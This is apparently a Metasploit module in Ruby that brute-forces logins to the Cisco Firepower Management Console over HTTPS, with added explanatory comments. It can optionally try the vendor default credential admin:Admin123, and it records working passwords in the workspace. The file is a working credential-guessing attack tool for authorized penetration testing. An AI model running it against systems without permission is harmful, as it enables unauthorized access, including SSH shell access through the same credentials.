Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/cisco_firepower'
require 'metasploit/framework/credential_collection'

# Auxiliary login scanner for the Cisco Firepower Management console web
# login (HTTPS on port 443 by default).
#
# Candidate credentials are assembled by build_credential_collection from the
# USERNAME / PASSWORD options (presumably together with the other AuthBrute
# options; that helper is not shown here) and, when TRYDEFAULT is set, the
# vendor default pair. Every handled attempt is written to the workspace:
# successes as credential logins, failures as invalidated logins.
#
# Defender notes: the module description states that the console credentials
# are also used for SSH, so a weak or unchanged default password on the
# console exposes shell access as well as the web UI. The request format lives
# in LoginScanner::CiscoFirepower, which is not shown here; repeated failed
# logins against the console are the trace to expect from this kind of test.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its two module-specific options.
  #
  # @param info [Hash] metadata merged with this module's defaults
  def initialize(info = {})
    module_info = {
      'Name' => 'Cisco Firepower Management Console 6.0 Login',
      'Description' => %q{
        This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.
        The credentials are also used for SSH, which could allow remote code execution.
      },
      'Author' => [ 'sinn3r' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'SSLVersion' => 'Auto'
      }
    }
    super(update_info(info, module_info))

    module_options = [
      OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
      OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])
    ]
    register_options(module_options)
  end

  # Builds the CiscoFirepower login scanner on first use and returns the
  # cached object on later calls.
  #
  # NOTE(review): the cache is not keyed on +ip+, so this assumes one module
  # instance handles one host. Confirm against the Scanner mixin.
  #
  # @param ip [String] target address handed to the login scanner as +host+
  # @return [Metasploit::Framework::LoginScanner::CiscoFirepower]
  def scanner(ip)
    @scanner ||= begin
      creds = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      # Opt-in only: TRYDEFAULT is false unless the operator sets it.
      if datastore['TRYDEFAULT']
        print_status("Default credential admin:Admin123 added to the credential queue for testing.")
        creds.add_public('admin')
        creds.add_private('Admin123')
      end

      scanner_options = configure_http_login_scanner(
        host: ip,
        port: datastore['RPORT'],
        cred_details: creds,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5, # fixed value; presumably seconds, confirm
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword'],
        uri: target_uri.path
      )

      Metasploit::Framework::LoginScanner::CiscoFirepower.new(scanner_options)
    end
  end

  # Records a working credential and the login it produced in the workspace.
  #
  # The password is passed to create_credential as +private_data+ with
  # +private_type: :password+, so the workspace then holds a live secret.
  #
  # @param ip [String] address of the service
  # @param port [Integer] port of the service
  # @param result [Object] scan result exposing +credential+, +status+, +proof+
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
      **service_data
    }

    login_data = {
      core: create_credential(credential_data),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service_data
    }

    create_credential_login(login_data)
  end

  # Marks a credential as not valid for this service via invalidate_login.
  #
  # @param ip [String] address of the service
  # @param rport [Integer] port of the service (the parameter shadows the
  #   +rport+ helper inside this method)
  # @param result [Object] scan result exposing +credential+, +status+, +proof+
  def report_bad_cred(ip, rport, result)
    failed = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: failed.public,
      private: failed.private,
      realm_key: failed.realm_key,
      realm_value: failed.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the scan against +ip+ and reports each attempt by its status.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; any other
  # status is neither printed nor reported.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      case result.status
      when login_status::SUCCESSFUL
        # The credential is interpolated into console output here.
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when login_status::UNABLE_TO_CONNECT
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when login_status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Per-host entry point: runs the scan only when check_setup accepts the
  # target.
  #
  # @param ip [String] target address
  def run_host(ip)
    return bruteforce(ip) if scanner(ip).check_setup

    print_brute(level: :error, ip: ip, msg: 'Target is not Cisco Firepower Management console.')
    nil
  end
end